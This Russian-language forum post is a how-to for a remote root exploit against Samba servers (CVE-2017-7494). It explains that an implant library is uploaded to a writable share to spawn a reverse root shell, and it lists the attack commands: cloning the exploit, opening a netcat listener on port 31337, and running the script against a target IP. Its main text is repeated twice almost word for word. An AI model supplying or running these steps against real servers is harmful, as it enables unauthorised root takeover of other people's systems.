Хай, codeby
В этой небольшой статье, я хочу показать root-exploit, предназначенный для проведения атаки на Samba – Server.
Samba — пакет программ, которые позволяют обращаться к сетевым дискам и принтерам на различных операционных системах по протоколу SMB/CIFS. Имеет клиентскую и серверную части. Является свободным программным обеспечением, выпущена под лицензией GPL.
Эксплоит, который мы рассмотрим – это удаленный root эксплойт для уязвимости SAMBA CVE-2017-7494.
Он разделен на две части:
· Во-первых, он компилирует полезную нагрузку под названием «implant.c» и генерирует библиотеку (libimplantx32.so или libimplantx64.so), которая изменяется на пользователя root, отделяется от родительского процесса и порождает обратную оболочку.
· Во-вторых, он находит доступную для записи долю в указанном целевом хосте, загружает библиотеку со случайным именем и пытается ее загрузить.
Пока цель уязвима и полезная нагрузка является правильной для целевой операционной системы и архитектуры, эксплойт на 100% надежен.
Получаем его с репозиториев Github.
> git clone https://github.com/joxeankoret/CVE-2017-7494
Тут же, есть его Ruby версия для Metasploit Framework - https://github.com/hdm/metasploit-f...les/exploits/linux/samba/is_known_pipename.rb
> cd CVE-2017-7494/
Использование:
> nc -p 31337 –l (Ожидаем подключение на указанном порту)
Затем запускаем эксплойт против целевого хоста и ждем, пока он подключится к нашему Netcat:
> python cve_2017_7494.py -t target_ip
Если вы закрыли shell, вместо того чтобы снова запускать эксплойт, загружающий модуль и т.д. Вы можете просто задать путь к уже загруженному модулю. Предположим, что он был загружен в / shared / directory / как «module.so», вы должны запустить команду, как показано ниже:
> python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
Мой Samba сервер не эксплуатируется, поэтому результат предоставить не могу.
К тому же, есть issue, на странице разработчика на Github:
> https://github.com/joxeankoret/CVE-2017-7494/issues
На виртуалках, я сталкивался с подобной ошибкой. Возможно, корректнее будет работать Ruby эксплоит.
На этом откланяюсь, спасибо.

Samba — пакет программ, которые позволяют обращаться к сетевым дискам и принтерам на различных операционных системах по протоколу SMB/CIFS. Имеет клиентскую и серверную части. Является свободным программным обеспечением, выпущена под лицензией GPL.
Эксплоит, который мы рассмотрим – это удаленный root эксплойт для уязвимости SAMBA CVE-2017-7494.
Он разделен на две части:
· Во-первых, он компилирует полезную нагрузку под названием «implant.c» и генерирует библиотеку (libimplantx32.so или libimplantx64.so), которая изменяется на пользователя root, отделяется от родительского процесса и порождает обратную оболочку.
· Во-вторых, он находит доступную для записи долю в указанном целевом хосте, загружает библиотеку со случайным именем и пытается ее загрузить.
Пока цель уязвима и полезная нагрузка является правильной для целевой операционной системы и архитектуры, эксплойт на 100% надежен.
Получаем его с репозиториев Github.
> git clone https://github.com/joxeankoret/CVE-2017-7494
Тут же, есть его Ruby версия для Metasploit Framework - https://github.com/hdm/metasploit-f...les/exploits/linux/samba/is_known_pipename.rb
> cd CVE-2017-7494/
Использование:
> nc -p 31337 –l (Ожидаем подключение на указанном порту)
Затем запускаем эксплойт против целевого хоста и ждем, пока он подключится к нашему Netcat:
> python cve_2017_7494.py -t target_ip
Если вы закрыли shell, вместо того чтобы снова запускать эксплойт, загружающий модуль и т.д. Вы можете просто задать путь к уже загруженному модулю. Предположим, что он был загружен в / shared / directory / как «module.so», вы должны запустить команду, как показано ниже:
> python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
Мой Samba сервер не эксплуатируется, поэтому результат предоставить не могу.
К тому же, есть issue, на странице разработчика на Github:
> https://github.com/joxeankoret/CVE-2017-7494/issues
На виртуалках, я сталкивался с подобной ошибкой. Возможно, корректнее будет работать Ruby эксплоит.
На этом откланяюсь, спасибо.